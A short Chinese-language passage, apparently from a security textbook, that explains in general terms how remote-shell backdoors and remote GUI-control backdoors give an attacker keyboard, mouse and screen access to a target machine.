远程shell比简单的单命令远程执行要强大得多，因为它们可以模拟攻击者对目标计算机的键盘有直接访问权的情形。

远程控制GUI（Remote Control of the GUI）：比将命令行解释器弄混乱更甚，有些后门可以让攻击者看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都是通过网络实现的。